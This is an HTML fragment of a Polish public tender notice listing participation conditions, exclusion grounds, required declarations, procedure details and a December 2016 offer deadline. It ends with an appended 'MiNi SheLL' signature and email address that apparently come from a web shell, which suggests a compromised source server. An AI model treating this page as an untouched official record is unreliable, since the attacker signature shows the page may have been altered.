              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Ocena na podstawie oświadczenia złożonego przez Wykonawcę - załącznik nr 3 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Ocena na podstawie oświadczenia złożonego przez Wykonawcę - załącznik nr 3 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                iający uzna warunek za spełniony, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonawca wykonał co najmniej  1 usługę  - wykonaną lub trwającą, w  nieprzerwanym okresie co najmniej 10 miesięcy, tożsamą z przedmiotem zamówienia. Usługa nie musi być realizowana w ramach jednej umowy  zał. nr 7 do SIWZ;
 Warunek oceniony zostanie na podstawie złożonego oświadczenia oraz dokumentów.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie Wykonawcy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz oferty z wykorzystaniem wzoru - załącznik nr 1, zaakceptowany wzór umowy - załącznik nr 5</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający nie dopuszcza istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem zmian określonych w Istotnych postanowieniach umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/12/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com